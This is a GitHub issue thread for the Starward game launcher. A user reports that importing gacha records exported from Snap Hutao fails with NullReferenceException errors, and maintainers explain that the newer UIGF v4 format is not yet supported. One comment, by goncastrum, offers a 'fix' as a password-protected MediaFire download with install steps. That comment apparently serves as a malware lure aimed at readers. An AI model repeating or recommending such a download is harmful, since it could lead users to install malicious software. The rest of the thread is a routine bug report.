### ISSUE TITLE
[Bug] 祈愿记录导入失败

### ISSUE THREAD

**Issue by jinyiwei2012** [Scighost/Starward#1073]
### Checklist

- [X] My issue was not mentioned by others, and it is not a duplicate issue.

### Description

![image](https://github.com/user-attachments/assets/b2efe5ce-958d-44f4-9389-9f3c9a8a965d)

### Reproduction Steps

从snap hutao 中导出祈愿记录后尝试导入失败

### Starward Version

0.13.1

### Windows Version

27695.1000

### Log

```shell
[22:35:29.665] [INFO] 
Welcome to Starward v0.13.1
System: Microsoft Windows NT 10.0.27695.0
Command Line: C:\Users\hyh_1\Desktop\Starward\app-0.13.1\Starward.dll

[22:35:29.696] [INFO] Starward.Services.DatabaseService
Database path is 'C:\Users\hyh_1\Desktop\Starward'

[22:35:29.717] [INFO] Starward.Services.DatabaseService
Database version is 10, target version is 10.

[22:35:29.802] [INFO] Starward.Pages.MainPage
Last game region is hk4e_cn

[22:35:29.816] [INFO] Starward.Pages.MainPage
Navigate to "GameLauncherPage" with param hk4e_cn

[22:35:30.484] [INFO] Starward.Pages.GameLauncherPage
Game install path of hk4e_cn: "C:\米哈游\原神"

[22:35:30.496] [INFO] Starward.Pages.GameLauncherPage
Acutal version and gamebiz of hk4e_cn is "5.0.0".

[22:35:31.430] [INFO] Starward.Services.UpdateService
Start to check update (Preview: True, Arch: X64)

[22:35:32.831] [INFO] Starward.Pages.MainPage
Navigate to "GachaLogPage" with param hk4e_cn

[22:35:48.348] [EROR] Starward.Pages.GachaLogPage
Import gacha log
System.NullReferenceException: Object reference not set to an instance of an object.
   at Starward.Services.Gacha.GenshinGachaService.ImportGachaLog(String file) in D:\a\Starward\Starward\src\Starward\Services\Gacha\GenshinGachaService.cs:line 135
   at Starward.Pages.GachaLogPage.ImportGachaLogAsync() in D:\a\Starward\Starward\src\Starward\Pages\GachaLogPage.xaml.cs:line 698

[22:36:34.030] [EROR] Starward.Pages.GachaLogPage
Import gacha log
System.NullReferenceException: Object reference not set to an instance of an object.
   at Starward.Services.Gacha.GenshinGachaService.ImportGachaLog(String file) in D:\a\Starward\Starward\src\Starward\Services\Gacha\GenshinGachaService.cs:line 135
   at Starward.Pages.GachaLogPage.ImportGachaLogAsync() in D:\a\Starward\Starward\src\Starward\Pages\GachaLogPage.xaml.cs:line 698

[22:37:11.508] [EROR] Starward.Pages.MainPage
Check update
System.Threading.Tasks.TaskCanceledException: The request was canceled due to the configured HttpClient.Timeout of 100 seconds elapsing.
 ---> System.TimeoutException: The operation was canceled.
 ---> System.Threading.Tasks.TaskCanceledException: The operation was canceled.
   at System.Net.Http.Http2Connection.Http2Stream.<>c.<WaitForDataAsync>b__88_0(Object s, CancellationToken cancellationToken)
   at System.Threading.CancellationTokenSource.Invoke(Delegate, Object, CancellationTokenSource)
   at System.Threading.CancellationTokenSource.ExecuteCallbackHandlers(Boolean)
   at System.Threading.TimerQueueTimer.Fire(Boolean )
   at System.Threading.TimerQueue.FireNextTimers()
   at System.Threading.ThreadPoolWorkQueue.Dispatch()
   at System.Threading.PortableThreadPool.WorkerThread.WorkerThreadStart()
   at System.Threading.Thread.StartCallback()
--- End of stack trace from previous location ---
   at System.Net.Http.Http2Connection.Http2Stream.System.Threading.Tasks.Sources.IValueTaskSource.GetResult(Int16)
   at System.Net.Http.Http2Connection.Http2Stream.ReadDataAsync(Memory`1, HttpResponseMessage, CancellationToken)
   at System.IO.Compression.BrotliStream.<ReadAsync>g__Core|25_0(Memory`1, CancellationToken)
   at System.Net.Http.Json.LengthLimitReadStream.<ReadAsync>g__Core|13_0(ValueTask`1)
   at System.Text.Json.Serialization.ReadBufferState.ReadFromStreamAsync(Stream, CancellationToken, Boolean )
   at System.Text.Json.Serialization.Metadata.JsonTypeInfo`1.DeserializeAsync(Stream, CancellationToken)
   at System.Text.Json.Serialization.Metadata.JsonTypeInfo`1.DeserializeAsObjectAsync(Stream, CancellationToken)
   at System.Net.Http.Json.HttpClientJsonExtensions.<FromJsonAsyncCore>g__Core|12_0[TValue,TJsonOptions](HttpClient, Task`1, Boolean, CancellationTokenSource, Func`4, TJsonOptions, CancellationToken)
   --- End of inner exception stack trace ---
   --- End of inner exception stack trace ---
   at System.Net.Http.Json.HttpClientJsonExtensions.<FromJsonAsyncCore>g__Core|12_0[TValue,TJsonOptions](HttpClient, Task`1, Boolean, CancellationTokenSource, Func`4, TJsonOptions, CancellationToken)
   at Starward.Core.Metadata.MetadataClient.CommonGetAsync[T](String url, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\Metadata\MetadataClient.cs:line 55
   at Starward.Core.Metadata.MetadataClient.GetVersionAsync(Boolean isPrerelease, Architecture architecture, CancellationToken cancellationToken) in D:\a\Starward\Starward\src\Starward.Core\Metadata\MetadataClient.cs:line 98
   at Starward.Services.UpdateService.CheckUpdateAsync(Boolean disableIgnore) in D:\a\Starward\Starward\src\Starward\Services\UpdateService.cs:line 42
   at Starward.Pages.MainPage.CheckUpdateAsync() in D:\a\Starward\Starward\src\Starward\Pages\MainPage.xaml.cs:line 126

[22:39:31.716] [EROR] Starward.Pages.GachaLogPage
Import gacha log
System.NullReferenceException: Object reference not set to an instance of an object.
   at Starward.Services.Gacha.GenshinGachaService.ImportGachaLog(String file) in D:\a\Starward\Starward\src\Starward\Services\Gacha\GenshinGachaService.cs:line 135
   at Starward.Pages.GachaLogPage.ImportGachaLogAsync() in D:\a\Starward\Starward\src\Starward\Pages\GachaLogPage.xaml.cs:line 698
```

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Scighost** [comment]
Snap Hutao 对于新标准的适配太快了，我们跟不上。

**Comment by Lightczx** [comment]
https://upgrader.uigf.org

**Comment by ChenHunGE** [comment]
这是因为snap hutao使用的是[UIGF v4.0+ 标准而starward使用的是v2.3可能是版本的兼容问题
这只能等作者去适配了吧
